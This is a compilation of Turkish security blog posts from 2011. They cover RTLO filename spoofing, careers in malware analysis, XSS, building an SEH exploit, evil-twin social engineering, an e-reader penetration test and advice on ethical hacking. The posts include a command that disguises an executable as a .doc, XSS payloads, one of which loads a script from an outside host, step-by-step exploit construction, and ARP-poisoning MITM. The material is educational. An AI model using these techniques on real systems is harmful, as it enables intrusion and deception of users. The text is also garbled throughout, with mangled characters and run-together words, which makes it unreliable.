Goumlrduumlğuumlnuumlz uumlzere programın uzantısı artık doc olarak goumlzuumlkuumlyor Komut satırından programın bulunduğu klasoumlrde DIR komutunuccedilalıştıracak olursanız bu yanılgının goumlruumlntuumlden ibaret olduğunu hemen anlayabilirsiniz

16

Python ile yukarıda bahsetmiş olduğum adımları (simge değiştirme hariccedil) otomatize eden RTLOpy isimli programa buradanulaşabilirsiniz

Programın kullanımı python rtlopy [extension] [source filename] [new filename]Oumlrnek kullanım python rtlopy doc calcexe Confidential_document_no_

Sonuccedil olarak Windows Vista veya Windows 7 kullanıcısıysanız ve eskiden kalma uzantı kontroluuml yaparak programları goumlzuuml kapalıccedilalıştırma alışkanlığınız varsa yakın zamanda sıkıntı yaşama ihtimaline karşı programları ccedilalıştırmadan oumlnce iccedilinde bulunduğu klasoumlrdeyer alan TYPE (Application ise dikkat) kolonuna veya HEX Editoumlr ile başlık bilgisine (ilk 2 bayt MZ ise dikkat) dikkat etmeniz faydalıolacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Zararlı Yazılım Analisti OlmakhellipSource httpswwwmertsaricacomzararli-yazilim-analisti-olmakBy MS on October 5th 2011

Son yıllarda Windows işletim sistemini hedef alan Zeus SpyEye TDL gibi hatrı sayılır zararlı yazılımlara manşetlerde sıkccedila rastlıyordukDaha sonra o ccedilok guumlvenli Mac OS X işletim sisteminin kullanım oranının artış goumlstermesi ile (bunun en buumlyuumlk nedenlerinden biri de MacOS Xe zararlı yazılım bulaşmaz yanılgısı olsa gerek) bu sisteme youmlnelik geliştirilen zararlı yazılımlar da manşetlerde yerini birer bireralmaya başladı Guumln geldi tweet atmaktan internette soumlrf yapmaya e-posta okumaktan bankacılık işlemleri gerccedilekleştirmeye kadar birccedilok alanda ihtiyaccedillarımızı karşılayabilen modern işletim sistemleri ile guumlccedillendirilmiş olan akıllı mobil cihazlar iccedilin geliştirilen zararlıyazılımlar manşetleri suumlslemeye başladı Peki bilgi hırsızlığı iccedilin geliştirilen zararlı yazılımlar neden bu kadar revaccedilta

17

Uumlnluuml bir banka soyguncusu olan Willie Suttone Neden banka soyuyorsunuz diye bir soru youmlnelten muhabirin aldığı Ccediluumlnkuuml paraorada yanıtını guumlnuumlmuumlze uyarlar ve Neden zararlı yazılım geliştiriyorsunuz diye bir soru soracak olsaydık alacağımız yanıt şuumlphesizCcediluumlnkuuml finansal getirisi ccedilok yuumlksek olurdu ve ilk sorduğumuz sorunun da yanıtını almış olurduk

Oumlyle bir duumlnyada yaşıyoruz ki hiccedil bir zaman kansere aidse ve diğer oumlluumlmcuumll hastalıklara ccedilare bulunmayacağına sadece bu hastalıklarınilerlemesini engelleyen kontrol altında tutan pahalı ilaccedilların piyasada olacağına inanıyorum BilgiBilişim guumlvenliği sektoumlruumlnuuml de aynışekilde duumlşuumlnuumlyorum Hiccedil bir zaman ccedilok guumlvenli bir işletim sistemi tasarlanmayacak veya bir antiviruumls yazılımı tuumlm zararlı yazılımlarıtespit ediyor veya sisteme bulaşmasını engelliyor olmayacak Durum boumlyle olunca da nasıl hastalıkların bulaşmasını engellemek tedavietmekten daha kolay ise aynı şekilde zararlı yazılımların da sistemlere bulaşmasını engellemek sistemlerden kaldırmaktan daha kolayolmaya devam edecek Zararlı yazılımlar ha bulaştı ha bulaşacak derken kurumlar daha fazla zararlı yazılım analistine veya bu beceriyesahip ccedilalışanları istihdam etmeye başlayacak ve bu sayede bu alanda uzmanlaşmak isteyenler bu işten keyif alanlar iccedilin zararlı yazılımanalizi hobi olmaktan ccedilıkarak mesleklerinin bir parccedilası haline doumlnuumlşecektir Oumlzellikle APTlerin dev kurumları hedef aldığı son aylardakendi personeli ile zararlı yazılım analizi yapabilen bir kurum olmanın getirisi (3 partilere guumlven kaygısı kapalı kapılar ardında ccediloumlzuumlmuumlretme ihtiyacı) paha biccedililmez olsa gerek

Peki zararlı yazılım analisti olmak iccedilin ne tuumlr bilgibecerilere sahip olmanız gerekiyor

Programlama becerisi Bilişim guumlvenliği uzmanı olupta programlama dili bilmiyorum demek kulağa ne kadar garip geliyorsa (gelmiyorsada ben ccedilok yadırgıyorum her zaman araccedillar işinizi goumlrmeyebilir) zararlı yazılım analistiyim ancak Assemblyden Javadan CdenCden anlamıyorum demek kulağa bir o kadar garip gelebilir Oumlrneğin Java ile yazılmış bir zararlı yazılımı decompile ettikten sonrakodu analiz etmeniz gerekecek bu durumda ne yapacaksınız Veya zararlı bir yazılımı assembly seviyesinde ccedilalışan bir debugger ile(Ollydbg veya Immnunity Debugger) analiz ediyorsunuz Assembly bilmeden programın akışına nasıl muumldahale edecek veya şifrelemeanahtarlarını nasıl ele geccedilireceksiniz Gereksinimler boumlyle olunca bir zararlı yazılım analistinin C ve Assembly programlama dillerineyabancı olmaması buna ilaveten diğer programlama dilleri ile yazılmış (C++ Java Net) programların kaynak kodlarına az ccedilok goumlzgezdirmiş olması gerekmektedir Bunlara ilaveten Python veya Ruby gibi programlama dillerinden faydalanarak hızlı bir şekilde kendiprogramınızı yazmanız gerekebilir Oumlrneğin hafızadan diske kayıt ettiğiniz (dump) zararlı bir yazılımdan otomatik olarak şifrelemeanahtarlarını toplayan ve şifrelemeyi ccediloumlzen bir program yazmak istiyorsunuz Şayet Python biliyorsanız IDAPython ile ufak betikler(script) yazmanız işinizi oldukccedila hızlandıracaktır Anlayacağınız uumlzere zararlı yazılım analisti olma konusunda ısrarcı iseniz birden fazlaprogramlama dili bilmeniz (uzman seviyesinde olmasa da) şart

Sistem ağ ve uygulama youmlneticisi becerisi En basitinden elinizde analiz etmeniz gereken bir zararlı yazılım var ve bunu kendisisteminizde analiz etmemeniz gerektiğini az ccedilok tahmin edebiliyorsunuzdur Bu durumda yapmanız gereken izole bir ortamda kontrolluumlbir şekilde bu yazılımı ccedilalıştırmaktır Bunun iccedilin sanal ortamlardan (VMWare veya Virtual Box iyi bir seccedilim olacaktır) oluşanzararlı yazılım analiz laboratuvarı kurmanız gerektiği iccedilin işletim sistemi kurulumundan konfiguumlrasyonuna sanal ağ yapılandırmalarıoluşturmaya kadar bir ccedilok konuda bilgi sahibi olmanız gerekmektedir Oumlrneğin Android işletim sistemini hedef alan zararlı bir yazılımıanaliz etmeniz gerekiyor Bu durumda mutlaka Android OS yuumlkluuml bir cihaza mı ihtiyacınız var Tabii ki hayır sanal sistem uumlzerinekuracağınız ve yapılandıracağınız bir emuumllatoumlr işinizi goumlrecektir Veya ağ uumlzerinden yayılmaya ccedilalışan zararlı bir yazılımın oluşturduğutrafiği izlemeniz ve analiz etmeniz gerekecek bu durumda ağ bilgisine ihtiyaccedil duyacaksınız misal hangi port uumlzerinden hangi protokoluumlkullanıyor şifreli mi haberleşiyor Veya analiz ettiğiniz zararlı yazılım internette bulunan bir web sunucusu uumlzerindeki 0 guumln zafiyetiniistismar etmeye ccedilalışıyor ancak analizi tamamlamak iccedilin bunu gerccedilekleştirmesine izin veremezsiniz bu nedenle sanal sisteminizinDNS kayıtlarını aradığı alan adını sanal sisteminize youmlnlendirecek şekilde yapılandırarak ve kuracağınız aynı suumlruumlm web sunucusunayoumlnlendirerek istismar etmesini sağlamanız ve analiz etmeniz gerekecektir Kısacası yeri gelecek sistem ağ ve uygulama youmlneticisininsahip olduğu huumlnerleri sergileyeceğiniz bir ortam oluşturarak zararlı yazılımın başarıyla ccedilalışmasını sağlayacak alt yapıyı oluşturmanızgerekecektir

Her zamanki gibi zararlı yazılım analizi ile ilgili kitaplar okumak (misal Malware Analysts Cookbook ve bu listede yer alan kitaplar)blogları ve haber kaynaklarını takip etmek (misal MNIN Security Blog) eğitimlere katılmak (misal SANSın Reverse-EngineeringMalware Malware Analysis Tools and Techniques eğitimi) ve tabii ki bol bol pratik yapmak (bunun iccedilin uumlzerinde zararlı yazılımtespit edilen sitelerin duyurulduğu twittercomhack4career twitter sayfasına goumlz atmak ve zararlı yazılımları indirerek incelemek iyi birbaşlangıccedil olabilir) zaman iccedilinde sizi başarıya ulaştıracaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

XSS = Basit Bir KutucukSource httpswwwmertsaricacomxss-ve-beefBy MS on August 19th 2011

Bu zamana dek cross-site scripting ile ilgili ccedilok sayıda makale hikaye okumuş olabilirsiniz ancak cross-site scripting zafiyetinin halenweb uygulamalarında en ccedilok rastlanan guumlvenlik zafiyetlerinin başında geliyor olması nedeniyle farkındalığı arttırma adına ben debirşeyler karalamak istedim

Cross-site scripting nam-ı diğer XSS ve Tuumlrkccedile meali ile siteler arası betik ccedilalıştırma zafiyeti ile ilgili son kullanıcı olarak buguumlne dekccedilok fazla haber duydunuz yazılımcı veya youmlnetici olarak ccedilok sayıda XSS yazan bir kutucuk goumlrduumlnuumlz ve bu nedenle XSS zafiyetininuygulama uumlzerinde zararsız kuumlccediluumlk bir kutucuk ccedilıkarmaktan ibaret olduğunu duumlşuumlnebilirsiniz ancak gerccedilekler bir kutucuk ile sınırlı değil

Siteler arası betik ccedilalıştırma zafiyeti (XSS) kabaca bir web uygulamasının girdi olarak kabul ettiği kodu (ccediloğunlukla javascript)filtrelemeden kullanıcıya sunması sonucunda ortaya ccedilıkmaktadır

18

Siteler arası betik ccedilalıştırma zafiyeti uumlccedile ayrılmaktadır

bull Kalıcı (persistentstored) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanına bir defa yazıldıktansonra daha sonra iccedileriğin internet tarayıcısı tarafından her ccedilağrılmasında (oumlrnek olarak foruma yazılmış bir mesajı veya bir haberinaltına yazılan bir yorumu duumlşuumlnuumln) tekrar ve tekrar kullanıcıya sunulur

bull Kalıcı olmayan (non-persistentreflected) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanınayazılmadığı iccedilin sadece bir defa internet tarayıcısı tarafından (E-posta veya sohbet programı uumlzerinden size goumlnderilmiş bir bağlantıadresine (URL) tıkladığınızı duumlşuumlnuumln) ccedilağrılması ile kullanıcıya sunulur

bull DOM tabanlı İstemci tarafında bulunan kodun (javascript) DOMa (Document Object ModelBelge Nesne Yapısıdır) muumldahaleetmesiyle ortaya ccedilıkmaktadır DOM tabanlı XSSin en guumlzel yanı istemci tarafında olduğu iccedilin sunucuya herhangi bir paketgoumlnderilmemektedir bu nedenle sunucu tarafında tespit edilmesi veya engellenmesi muumlmkuumln olmaz

XSS zafiyetinin sadece kutucuk ccedilıkartarak ccedilerez (cookie) ccedilalarak veya olta (phishing) saldırılarında kullanarak istismar edilmeyeceğinedair en guumlzel oumlrneği Apachenin geccedilen sene başına gelenlerden oumlğrenebilirsiniz 2010 yılında art niyetli kişiler tarafından Apachesunucularında bulunan bir web uygulamasında keşfedilen XSS zafiyetinin istismar edilmesi ile başlayan sızma girişimi sunuculardaroot yetkisine sahip olmaları ile son buldu Farkındalığı arttırma adına mutlaka okunması ve okutturulması gereken bu olaya ait detaylıbilgiye buradan ulaşabilirsiniz

XSS zafiyeti ile ilgili bir oumlrnek uumlzerinden geccedilmezsek anlaşılması guumlccedil olacağı iccedilin ufak bir oumlrnek uumlzerinden hızlıca ilerleyelim

Aşağıda yer alan bağlantı adresini ziyaret edecek olursanız karşınıza tfSearch parametresine girdi olarak belirtilen Mert kelimesininaratılması sonucunda sunucu tarafından doumlnen yanıtı goumlreceksiniz Uygulama tarafında tfSearch parametresinde girdi kontroluuml (koumltuumlkarakter filtrelemesi) yapılmadığı iccedilin XSS zafiyetine yol accedilmaktadır

XSS zafiyeti istismar edilmeden kullanım (tfSearch parametresinde XSS zafiteyi bulunmaktadır)

httptestaspvulnwebcomSearchasptfSearch=Mert

XSS zafiyetini istismar ederek kullanım 1 (alarm kutucuğu)

httptestaspvulnwebcomSearchasptfSearch=ltscriptgtalert(XSS)ltscriptgt

XSS zafiyetini istismar ederek kullanım 2 (başka bir siteden zararlı javascript kodu ccedilağırma)

httptestaspvulnwebcomSearchasptfSearch=ltscript SRC=httphackersorgxssjsgtltscriptgt

Unutmayın XSS zafiyetini istismar ederek zararlı bir siteden zararlı javascript kodu ccedilağırmanızı sağlayan art niyetli kişiler internettarayıcınızı uzaktan youmlneterek tuumlm tuş kayıtlarınızı izleyebilir ziyaret ettiğiniz siteleri tespit edebilir Metasploit ile internet tarayıcınızınzafiyetlerini istismar ederek sisteminize sızabilir veya adsl modeminizin youmlnetim sayfasındaki CSRF zafiyetini istismar ederek youmlneticişifrenizi değiştirerek modeminizi kontrol edebilir

Tuş kayıtlarının Beef aracı ile nasıl izlenebildiğini goumlsteren videoyu şiddetle izlemenizi tavsiye ederim

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin beşincisi burada son bulurken herkese guumlvenli guumlnler dilerim

5 Dakikada SEH İstismar Aracı (Exploit) HazırlamaSource httpswwwmertsaricacomtestBy MS on July 19th 2011

Yazılarımı takip edenleriniz daha oumlnce SEH İstismarını konu olan bir yazı yazdığımı hatırlayacaktır Buguumlnkuuml yazımda SEH istismararacının Immunity Debugger uumlzerinde ccedilalışan pvefindaddrpy eklentisi ile nasıl kısa bir suumlre iccedilinde hazırlanabileceğini goumlreceğiz

Immunity Debugger istismar aracı (exploit) hazırlamak zararlı yazılım (malware) analizi ve tersine muumlhendislik yapmak isteyenlericcedilin oldukccedila başarılı bir hata ayıklama (debugger) aracıdır Sade ve anlaşılır arayuumlzuuml komut satırı desteği ve Python ile betik (script)hazırlamaya imkan tanıyan desteği sayesinde masauumlstuumlmuumln vazgeccedililmezleri arasında yer almaktadır

pvefindaddrpy eklentisi Peter Van Eeckhoutte tarafından istismar aracı hazırlamak iccedilin oumlzel olarak tasarlanmış ve iccedilinde paternoluşturmaktan otomatik istismar kodu şablonu oluşturmaya kadar bir ccedilok oumlzelliğe sahiptir Eklentinin kullanımı ile ilgili detaylı bilgiyeburadan ulaşabilirsiniz

Adımlara geccedilmeden oumlnce ilk olarak sisteminizde yuumlkluuml olan Immunity Debugger aracı iccedilin pvefindaddrpy aracını buradan indirerek CProgram FilesImmunity IncImmunity DebuggerPyCommands klasoumlruuml altına kopyalayın

İstismar edilecek araccedil olarak daha oumlnceki yazımda adı geccedilen Free WMA MP3 Converter v11 aracını kullanacağız

Immunity Debugger aracını ccedilalıştırdıktan sonra File -gt Open menuumlsuumlnden CProgram FilesFree WMA MP3 ConverterWmpconexearacını seccedilelim ve Open butonuna basalım F9 tuşuna basarak programı ccedilalıştıralım Komut satırında pvefindaddr pattern_create5000 yazarak 5000 bayt buumlyuumlkluumlğuumlnde bir patern oluşturalım Oluşturulan patern CProgram FilesImmunity IncImmunity Debuggermspatterntxt dosyası olarak kayıt edilmektedir

19

Dosyanın iccedilindeki paterni taslak halde olan istismar aracımıza (exppy) kopyaladıktan sonra ccedilalıştırarak WMA MP3 Converterprogramında yer alan hatayızafiyeti tetikleyecek WAV uzantılı dosyayı (MSwav) oluşturalım

WMA MP3 Converter programında yer alan WAV to MP3 butonuna basarak MSwav dosyasını seccedilelim ve Immunity Debugger aracıuumlzerinde Access Violation hatası ile karşılaştıktan sonra komut satırında pvefindaddr suggest yazarak eklenti tarafından bize oumlnerilenistismar aracı oluşturma şablonunu goumlruumlntuumlleyelim (Oumlnerilen kod Perl diline youmlnelik olduğu iccedilin bu kodu Python koduna ccedilevirmemizgerekecektir)

20

Karşımıza ccedilıkan youmlnergelerde istismar aracının başarıyla ccedilalışabilmesi iccedilin POP POP RET adresine ve kabuk koduna (shellcode)ihtiyacımız olduğu belirtildiği iccedilin komut satırında oumlncelikle pvefindaddr p -n yazarak SAFESEHin devre dışı olduğu bir DLLde yeralan POP POP RET adresi bularak istismar aracımızın iskeletini oluşturmaya devam edelim

21

Son olarak hesap makinasını (calcexe) ccedilalıştıracak kabuk kodunu (shellcode) ister Metasploit ile oluşturarak ister herhangi bir istismararacından kopyalayarak şablonda ilgili yere kopyalayarak iskeleti tamamlayalım ve istismar aracını ccedilalıştırarak zafiyeti istismar edenWAV dosyasını oluşturalım WMA MP3 Converter programını ccedilalıştırdıktan sonra MP3 butonuna basarak istismar aracımız tarafındanoluşturulan yeni MSwav dosyasını seccediltiğimizde hesap makinası karşımıza ccedilıkacak ve mutlu sona ulaştığımızı goumlreceğiz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin doumlrduumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Şeytan İkizSource httpswwwmertsaricacomseytan-ikizBy MS on June 19th 2011

Geccediltiğimiz aylarda RSAin sistemlerine sızan kişilerin Securid ile ilgili bilgileri ccedilaldıkları ortaya ccedilıktı RSA tarafından yapılanaccedilıklamada saldırıların başlangıccedil noktasında sosyal muumlhendislik ve olta saldırısı (phishing) olduğu dikkat ccedilekiyordu Olta saldırısınıgerccedilekleştirmek iccedilin sosyal ağlardan faydalanan ahlaksız korsanların RSA ccedilalışanlarına ait bilgileri elde ettikleri tahmin ediliyor

İşin iccedilinde insan faktoumlruuml olduğu suumlrece 100 haneli şifre ile korunan bir sisteme sızmak isteyenler şifreyi kırmak yerine sistemsorumlularını kandırma yolunu tercih ediyorlar ve eninde sonunda başarıya ulaşıyorlar bu nedenle RSAin başına gelenlere ccedilokşaşırmıyorum oumlzellikle sosyal ağlarda firma ccedilalışanları tarafından paylaşılan bilgilerin ilerleyen zamanlarda ccediloğu firmanın başını dahaccedilok ağrıtacağını duumlşuumlnuumlyorum

Art niyetli kişiler sosyal muumlhendislik saldırılarında olta saldırılarından faydalandıkları gibi şeytan ikiz (Tuumlrkccedile mealini kendimuydurdum aslı evil twinkoumltuuml ikiz) youmlnteminden de faydalanabiliyorlar Şeytan ikiz youmlntemi teknolojinin nimetlerinden faydalanarakhedef kurumsistemler hakkında o kurumun bir ccedilalışanını taklit ederek hedef kişikişiler uumlzerinden bilgi toplamak kurum sistemlerinesızmak iccedilin hedef kişikişilerin zararlı bir dosyayı (RAT) ccedilalıştırmaları amacıyla kullanılıyor

Amaccedilları gerccedilek bir kişiyi taklit etmek olduğu iccedilin art niyetli kişiler kurban ile ilgili tuumlm bilgileri Facebook Twitter Linkedin Foursquaregibi sosyal ağlardan toplayarak bir araya getiriler Facebook ve Twitter durum mesajları uumlzerinden bu kişinin neler yaptığını Linkedinuumlzerinden oumlzgeccedilmişini Foursquare uumlzerinden hangi mekanlara sıkccedila uğradığını Google arama motoru uumlzerinden de elde edebildiklerigeri kalan bilgileri elde ederek hedef bir sosyal ağ seccediler (kurum ccedilalışanlarına ulaşması kolay olduğu iccedilin ccediloğunlukla Linkedini tercihederler) ve daha sonra burada bu kişi adına sahte bir profil oluşturarak bu kişinin bağlantıları ile iletişime geccedilerek bu kişiyi taklit ederekbağlantı kurdukları kişileri kandırarak hassas bilgilere erişmeye ve oradan sistemlere sızmaya ccedilalışırlar Bu saldırıların oumlnuumlne geccedilmekisteyen kurumsal firmalar ccedilalışanlarının iş ile ilgili sosyal ağlarda (Linkedin) profillerini genele accedilmamaları ve kurumal e-posta adresleriile bu tuumlr sitelere uumlye olmamaları konularında uyarırlar

Genele accedilık Twitter hesabım olduğu iccedilin birguumln Twitter uumlzerinden kendimle ilgili ne tuumlr bilgiler elde edebileceğini merak ettim ve buzamana dek goumlndermiş olduğum mesajları arşivleyen bir site aradım ancak bulamadım Kafaya koyan biri buguumlne kadar goumlndermişolduğum tuumlm mesajları elde edebilir mi diye kafa patlatmaya başladım ve ufak bir program hazırlamaya başladım ve sonunda ortayahedef twitter hesabından buguumlne kadar goumlnderilen tuumlm mesajları toplayan ve kayıt eden twitter_crawlerpy adında bir program ortayaccedilıkıverdi

Programa buradan ulaşabilirsiniz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin uumlccediluumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Ekran goumlruumlntuumlsuuml

22

Cybook Orizon Mini PentestSource httpswwwmertsaricacomcybook-orizon-mini-pentestBy MS on April 19th 2011

Bilişim guumlvenliği ile ilgili teknik kitaplar okumaya bayılıyorum oumlzellikle beni zorlayan ccedilıta yuumlkselten kitaplar oldu mu tadındanyenmiyor Kitap okumadığım zaman geri kaldığımı duumlşuumlnerek kendimi koumltuuml hissediyorum bu nedenle kitap okuma konusunda ilginccedilbir motivasyona (takıntı da denebilir )) sahibim Uumlniversite zamanında hayatımın buumlyuumlk bir boumlluumlmuuml bilgisayar başında e-book okumakile geccedilerken iş hayatına geccediliş sonrasında e-book ccedilıktıları ile gezer durur oldum Oumlzellikle işe giderken ve işten gelirken serviste kitapokumak benim iccedilin buumlyuumlk bir keyif ancak her guumln 10-20 sayfalık ccedilıktı almak A4e bassan kocaman kitapccedilık yapsan kuumlccediluumlcuumlk kağıtisrafı goumlz yorgunluğuydu derken okuma aşkı beraberinde bir ccedilok sorunu da getiriyor

Neyse ki nişanlım duruma muumldahale ederek geccediltiğimiz aylarda bana bir e-book okuma cihazı hediye etti Cybook Orizon Duumlnyanın enince e-book okuma cihazı olmasının yanısıra hafif olması (250 gr) dokunmatik ekrana sahip olması micro-usb girişinin olması 2 GBdahili belleğe WIFI bluetooth ve akselerometreye (accelerometer) sahip olması beni memnun eden oumlzelliklerinin başında geliyor

Ahlaklı korsana hediye edilen elektronik cihazın ufak ccedilaplı penetrasyon testinden geccedilirilmemesi gibi bir durum soumlz konusu olamazdıolmadı da )

Teste ilk olarak port taraması ile başladım ve hiccedil accedilık port bulamadım

Daha sonra ARP zehirleme ile MITM (ortadaki adam) saldırısı gerccedilekleştirerek tuumlm trafiği izlemeye başladım Web trafiğindenelde ettiğim bilgiler sayesinde cihaz uumlzerinde ARM Linux kullanıldığını 2621 kernel suumlruumlmuumlne sahip olduğunu ve Mozilla tabanlıoumlzelleştirilmiş bir internet tarayıcısı kullanıldığını oumlğrendim

23

Internet tarayıcısında denediğim aboutconfig ve benzer youmlntemlerin hiccedilbiri işe yaramadı Bunun uumlzerine IKAT (Interactive Kiosk AttackTool)in sitesine bağlanarak internet tarayıcısı uumlzerinden işletim sistemine erişecek youmlntemleri de teker teker denedim ancak yine başarılıolamadım

Cihaz uumlzerinde bluetooth desteği olduğunu soumlylense de henuumlz aktifleştirilmemiş ve yerleşik yazılım (firmware) guumlncellemesi ileaktifleştirileceği belirtiliyor Bu durum aslında yerleşik yazılım uumlzerinde bir ccedilok opsiyonun gizlendiğine işaret ediyor Cybookunsitesinden indirmiş olduğum yerleşik yazılımı incelediğimde normal olarak anlamlı hiccedilbir karakter dizisi ile karşılaşmadım Karakterdağılımına baktığımda ise neden karşılaşmadığım ortadaydı Yerleşik yazılım uumlzerinde yer alan ilk 5 bayt (Boo16) dikkatimi ccedilekti ancakarama motorları uumlzerinde yaptığım araştırmalar sonuccedilsuz kaldı Yerleşik yazılım uumlzerinde manipuumllasyonlar gerccedilekleştirerek ipuccedilları eldeetme yolunu tercih etmek isterdim ancak yazılımın bozulması durumunda bana yol koumlpruuml baraj olarak geri doumlneceği iccedilin daha ilerigitmedim )

Cihaz uumlzerinde yer alan menuumllerde gezinirken Ebook Store menuumlsuumlnuumln ilginccedil işlevi dikkatimi ccedilekti Bu menuumlye girince internet tarayıcısıotomatik olarak sizi Cybookun bir alt sitesine youmlnlendiriyor ve cihazı ADOBE ID ile aktifleştirmenizi sağlıyor Buraya kadar herşeynormal ancak aktifleştirme kısmında javascript ile cihaza goumlnderilen komutlar dikkatimi ccedilekti BOO_CMD ile goumlnderilen her komutunbir işlevi bulunuyor ve site bağımsız olarak bu komutları nerede goumlruumlrse goumlrsuumln aynı işlevi yerine getiriyor Komutları ortaya ccedilıkartmak(enumerate) iccedilin ufak bir betik (script) hazırlayarak karakterinden sonra gelebilecek en fazla 4 karakterden oluşan komutları (dahafazlası web sayfasının boyutunu buumlyuumltuumlyordu) oluşturdum ve daha sonra cihazın oluşturduğu trafiği izlemeye başladım ancak Syncdışında trafik oluşturan herhangi bir komut karşılaşmadım

Son olarak cihazın guumlvenli bir siteye (SSL) bağlanma esnasında sahte sertifika ile karşılaşması durumunda nasıl bir aksiyon aldığınıgoumlrmek iccedilin ufak bir test gerccedilekleştirdiğimde beni uumlzen bir durum ile karşılaştım Cihaz guumlvenli bağlantının kurulması esnasındaMITM saldırısı gerccedilekleştirilmesi durumunda herhangi bir uyarı vermeden iletişim kurmaya devam ediyor yani Starbucksta kahveniziyudumlarken bir yandan e-postalarımı guumlvenli bir şekilde kontrol edeyim deme gibi bir şansınız ne yazıkki bulunmuyor

24

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin birincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Nasıl Ahlaklı Korsan Olunur Source httpswwwmertsaricacomnasil-ahlakli-korsan-olunurBy MS on May 19th 2011

Bu soruyu kendime ilk sorduğumda 15-16 yaşlarındaydım Google arama motorunun var olduğu ama bilinmediği o yıllarda Altavistaarama motoru ile bu soruya yanıt aramak ve cevabını iccedileren sayısız kaynağa ulaşmak pek muumlmkuumln olmuyordu bu nedenle benim deyolum o zamanlar kullanımı oldukccedila popuumller olan IRC sunucularından geccedilti EFnet IRC Ağında yer alan Hackers kanalında sabahakşam konuşmaları takip ederek az da olsa birşeyler oumlğrenmeye ccedilalışıyordum Guumlnuumln birinde sohbet ettiğim bir kişi (keşke rumuzunuhatırlayıp teşekkuumlr edebilsem) samimi bir şekilde programlama konusunda bilgi sahibi olmam gerektiğini ve işletim sistemi olaraksadece Windows ile yetinmeyerek Linux işletim sistemi de kullanmam gerektiğini soumlylemişti Programlama kısmını anlıyordum ancakkara kuru bir ekranda ccedilalışmanın bana ne gibi bir getirisi olacağı konusunda şuumlphelerim vardı Aradan 15 sene geccediltikten ve ahlaklı korsan(ethical hacker penetration tester) olduktan sonra ne zaman program yazsam kendi kendime adam haklıymış der ne zaman Backtrackile ccedilalışmam gerekse al sana kara kuru ekran der dururum )

Ne mutlu bana ki duumlnyanın 4 bir yanından oumlzellikle genccedil arkadaşlardan ccedilok sayıda e-postalar alıyor ve her birini oumlzenle yanıtlıyorumCcediloğunun yanıtını aradığı tek bir soru var nasıl ahlaklı korsan olurum nereden ve nasıl başlamalıyım

Oumlncelikle yazımı ahlaksız korsanların okuması ihtimaline karşı neden ahlaklı olunması gerektiği konusunu kısaca bir kaccedil madde ileaccedilıklayayım

bull Yasalar ile başınız derde girmez

bull Bu işi kariyere doumlnuumlştuumlrerek uzun vadede para kazanabilirsiniz

bull İnsanların guumlvenini sevgisini ve saygısını kazanabilirsiniz

bull İşvereninizin desteğini arkanıza alarak pahalı eğitimlere konferanslara bedava katılma şansı yakalayabilirsiniz )

Gelelim ahlaklı korsan olmak iccedilin yapmanız gerekenlere

bull İngilizce oumlğrenin Herşeyden oumlnce İngilizce bilmeniz gerekir en azından okuduğunuzu anlayacak kadar diyelim Nedeni basitguumlvenlik sektoumlruumlnde gerccedilekleştirilen ccedilalışmalardan kaynaklara kadar ccediloğu materyalin dili İngilizce bu nedenle guumlndemigelişmeleri yakından takip edebilmek iccedilin ne yapın ne edin oumlncelikle İngilizce oumlğrenmeye bakın olmazsa olmaz

bull Programlama dili oumlğrenin Hackerın İngilizce soumlzluumlk anlamına bakacak olursanız programcı kelimesinin geccediltiğini goumlrebilirsinizKorsan olupta programlama bilmemek gibi bir şansınız yok yok diyenlerede itibar etmeyin İstismar aracı hazırlamayı bir kenarakoydum en azından kısa zamanda ccedilok iş başarabilmek ve bunu otomatiğe bağlayabilmek iccedilin kendi programınızı yazmanız gerekenzamanlar mutlaka olacaktır Teknik olarak ileri seviyeye ilerledikccedile (misal tersine muumlhendislik yaparken) programlamanın şartolduğunu goumlrebilirsiniz Guumlvenlik zafiyeti keşfedebilmek iccedilin C programlama dilini oumlğrenmeniz gerekecektir Bu dil sayesindediğer programlama dillerini okuduğunuzda rahatlıkla anlayabildiğinizi goumlreceksiniz bu sayede kaynak kodu analizi sizin iccedilin dahakolay olacaktır Testler esnasında işinizi kolaylaştıracak dillerden bir tanesini muhakkak oumlğrenmelisiniz Bunun iccedilin Pythonutercih ettim mutluyum huzurluyum Kapalı kaynak kodlu yazılımlarda guumlvenlik zafiyeti keşfetmekten istismar kodu kabuk koduoluşturmaya kadar bir ccedilok aşamada Assembly programlama dilini biliyor olmanız yararınıza olacaktır Metasploit ve diğer araccedillarile hepsini hallederim demeyin başlangıccedil seviyesinden oumlteye gidemez program bağımlı yaşarsınız

bull Bol bol okuyun ve pratik yapın Ağ sistem veritabanı web uygulaması konularında temel kitaplar okuyun ve bilgi seviyeniziarttırın Temel seviyede bilgi sahibi olduktan sonra tuumlm bu alanlar ve daha fazlası ile ilgili hacking kitapları okumaya başlayınBunun iccedilin Amazoncom sitesine giderek hacking anahtar kelimesi ile sorgular yapın ve en ccedilok okunan beğenilen kitapları sıraylaokumaya başlayın Başlangıccedil seviyesi iccedilin Hacking Exposed serilerini oumlnerebilirim Okuduğunuzu pratik etmezseniz unutmanızve ihtiyaccedil duymanız durumunda tekrar okumanız gerekebileceği iccedilin kendinize windows ve linux işletim sistemleri kurulu ikisanal makina oluşturun ve tuumlm denemelerinizi oumlğrendiklerinizi bu sistemler uumlzerinde gerccedilekleştirerek pratiğe doumlkuumln

